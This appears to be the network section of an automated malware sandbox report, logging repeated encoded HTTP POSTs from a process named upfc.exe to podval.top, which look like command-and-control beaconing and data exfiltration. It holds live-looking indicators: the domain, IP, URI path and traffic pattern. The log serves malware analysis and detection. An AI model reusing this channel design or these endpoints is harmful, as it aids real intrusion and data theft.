                                                    Jul 3, 2024 16:42:54.110841036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:54.449040890 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Muap3lfj%2FYvB%2FQE7TkM%2BfYcFAyPIw6P1Ha5Z7FeJ19eKTI5qX1iKfJgAKxdXMKSjIP8IpbXlXV1MGUyjSKUlFvJGMnJbzItDLPRMPj3VgUpj1qqcW%2Ft8cRBNb2iM"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a50fd8a14331-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    57 | 192.168.2.10 | 49774 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:54.578217983 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:54.932209015 CEST | 1060 | OUT | Data Raw: 5f 53 5a 58 5b 57 52 58 58 56 55 51 50 58 59 55 55 5d 5e 58 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZX[WRXXVUQPXYUU]^XQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z'*<$/\3?* .)0:$U 8./42 _8"['$Y !
                                                    Jul 3, 2024 16:42:55.052855015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:55.412673950 CEST | 579 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOlZVERodDFL431e6pUWoU6Yk9r8xP0nS7LIq%2BdUaRpJ1sVWet1OW0El%2FHJd7f%2FKtqVJGRLB0%2FPz3Q6Kw8Ftt54dh1u6LO5%2B6VN3bhUEx6JKHckeoiobKrOTpodJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a515cc7e4366-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:55.506344080 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    58 | 192.168.2.10 | 49776 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:55.641944885 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:55.994710922 CEST | 1060 | OUT | Data Raw: 5f 51 5a 5c 5b 5d 52 58 58 56 55 51 50 5e 59 52 55 59 5e 59 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _QZ\[]RXXVUQP^YRUY^YQXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2*?&*;%0?]*>. .%\9.6$%\$U+R,>44$^8,"['$Y
                                                    Jul 3, 2024 16:42:56.088675022 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:56.473120928 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KzE6qljATUu82PpLeohEo%2BJ7Uy%2FT2vZOBcFoCECm%2FYMYTmUnUOvoM5GP1tT3zzRAs8T2wtz2TMCpdU4GDmhKFV%2FANdR9fzfD2472tJ9wDdrrnCHoTR%2BW4HG4el%2Fn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a51c4f195e64-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    59 | 192.168.2.10 | 49777 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:56.607271910 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:56.963352919 CEST | 1060 | OUT | Data Raw: 5a 56 5f 5c 5b 57 57 58 58 56 55 51 50 5e 59 5a 55 5c 5e 5b 51 5d 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_\[WWXXVUQP^YZU\^[Q]S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%33(*X17:.06' <,X' #/"['$Y
                                                    Jul 3, 2024 16:42:57.054595947 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:57.428008080 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYndJHp0w%2BotbK5rVVh8yElcR36wIFVmVusQkCyBV5ol5V3RPVGGVOTuZQ%2BjqUAsIm3bH5qL%2B1ApJUtMv%2FMTncMPDTENyL1TV6jUI6PuxX0%2BNX8eYFLBZEuQg6WW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5224bb17c9f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    60 | 192.168.2.10 | 49778 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:57.563988924 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:57.916486025 CEST | 1056 | OUT | Data Raw: 5f 56 5f 5e 5e 5b 52 5a 58 56 55 51 50 59 59 50 55 5f 5e 5a 51 5d 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_^^[RZXVUQPYYPU_^ZQ]S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&)<D''$3;*>79Y.-=Z'5]0,.[4</"['$Y )
                                                    Jul 3, 2024 16:42:58.026321888 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:58.369852066 CEST | 576 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35jWX3ATCEyhyFiocxR8jRjET1xnPLHo7UyLZYtTAsnrRaytonkzdx9gQEfG8AWTKL9%2Fz1PwwRB6l0sOi1MiFcrgrCf8DSXjfFMPnPbHmWMYsyfC9F621VPbM2eu"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5286c025e5f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    61 | 192.168.2.10 | 49779 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:58.820313931 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    62 | 192.168.2.10 | 49780 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:59.128642082 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:59.482965946 CEST | 1756 | OUT | Data Raw: 5f 55 5f 5a 5b 59 52 58 58 56 55 51 50 59 59 5a 55 59 5e 5f 51 58 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_Z[YRXXVUQPYYZUY^_QXS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&98E'8'#7)-U4=)]-X'6*33+/X#14_/<"['$Y
                                                    Jul 3, 2024 16:42:59.574567080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:59.791282892 CEST | 725 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcdBqrY9rm7H5jUuxqCBBxAkK1fuXjW1JJVwSKWKszFwIAGGQGLQywWtkVvDaF8QpIAd7Z82rPY8lHzP0w1PwwBQ2y3UNQpDHTtnDi2GA9WHnKYA6%2Fewa2f3LEic"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5321f7a8cda-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 26 5c 2d 5a 32 0c 2b 55 3a 03 3f 57 3f 03 34 1b 2f 29 36 07 28 0a 35 13 2e 10 04 16 34 04 2e 18 3f 02 09 06 26 30 27 0e 22 21 20 5b 04 1c 23 59 3c 14 25 5f 2b 06 23 11 32 02 08 1f 27 24 36 02 33 05 2a 1c 30 28 3f 12 3f 06 25 55 30 1c 28 04 3e 28 00 12 28 34 2e 13 22 24 21 54 02 13 22 1d 30 3e 21 53 37 33 27 1e 31 09 3d 16 27 34 23 52 30 0d 00 1d 2a 20 36 1d 27 08 34 5b 21 2f 3f 57 27 16 2e 17 30 3d 2d 5d 35 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&\-Z2+U:?W?4/)6(5.4.?&0'"! [#Y<%_+#2'$63*0(??%U0(>((4."$!T"0>!S73'1='4#R0* 6'4[!/?W'.0=-]5#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    63 | 192.168.2.10 | 49781 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:59.252626896 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:59.604455948 CEST  1056               OUT        (encoded request body)
                                                    Jul 3, 2024 16:42:59.698293924 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:00.043376923 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7G7KAL%2F9X1jYdUNeFzshwFXT%2FgTDGPK8L0Qa6ORrySJ8GybotQVc86fYQrHW1C65pXtHqWcwvrwLjDMpBnuGtJreMNKEEU8s3oRwxzUJOCieIwAAvBTFE8BPAJZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a532db068cec-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    64          192.168.2.10  49782        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:43:00.171107054 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:00.526432037 CEST  1060               OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:00.666547060 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:00.872206926 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gcep6Vjw8A7oiMNWa97GvrdOoyc2RU2cy1wwCuYHDWeUJjCHjbRhhURMUfvpKeNpSWa9ruKzj4Hio7V%2FeScv78%2F7f%2BzzxNEvFHbKfRn%2FgZuWpH44mLRM%2BAeRCV3W"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a538ddc34327-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    65          192.168.2.10  49783        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:43:01.204329014 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:01.560837030 CEST  1060               OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:01.656590939 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:02.005528927 CEST  588                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1IuGYH8P0X8uMwP221DBonmc%2BkgDAOtn67Mvtd%2B1XdlDKSwqs5Qx%2BASC8CV8CsXHgGBI6Ipf4KQbY7ZbbvLm4%2F1E4j1V4%2B1wO28t%2FSHrY1fzzVNs%2BHEiuIZ2XSU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a53f1a2f0f8b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    66          192.168.2.10  49784        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:43:02.141688108 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:02.494625092 CEST  1060               OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:02.589682102 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:02.956029892 CEST  576                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lppXqCZ0R9bH7FiLWD%2Fw3mCvCqeUfHjOEFNzcoCUZ4ydPKPTpFkyau5Xcd89eCcy2BxyQyzC9aviymbBbkJOVJNyLrFpxBBWYkgUYasV43WhMVhmtMQTXmioO75t"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a544eb1f7d05-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port
                                                    67          192.168.2.10  49785        188.114.97.3    80
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:43:02.458951950 CEST  293                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:02.807280064 CEST  344                OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:03.009331942 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:03.532474995 CEST  1236               IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Td2VLk0UJF9fL4%2FwXQdvRNGQNynRizt0xpU4Gz8OsLjUN4HwwRTAcemosk1S%2FDYRlE2s92yxRyhbm8mACfEqm2p3i6fu8FLqVBjUe7Cw9sJ3wiVDzFKAuEXu6JRP"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5478ae97cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:03.532692909 CEST  704                IN         (encoded response data)
                                                    Jul 3, 2024 16:43:03.594738960 CEST  269                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:03.690135002 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:03.690380096 CEST  384                OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:03.985858917 CEST  1236               IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkBKlf%2BrOaylPrznX22P70J5fyUCpgcykk0h%2BWM7JqRgSePvx6GzfOPzHcujYeven9MSJK77E7gmE9LxXPSRulWPYkUrvGd2Io7Zezvldm36rSzQ1D9RogfM15kn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54bcf6e7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:03.985881090 CEST  388                IN         (encoded response data)
                                                    Jul 3, 2024 16:43:04.030235052 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:04.125884056 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:04.128640890 CEST  1772               OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:04.427103996 CEST  725                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rptVC7n00K9di7PHEr08XON0eOFPFt7OYjMHFOgWNL04Ln7H8Xytho30hNldUiWr9RWFe7oCwAUchhtDnzKHtFGXShmIOOVMDwJgCjagOR4sZZbOCEqF68x%2FErgA"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54e8a337cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:05.433264017 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:05.527570009 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:05.531584024 CEST  1792               OUT        (encoded request body)
                                                    Jul 3, 2024 16:43:05.870942116 CEST  735                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:05 GMT
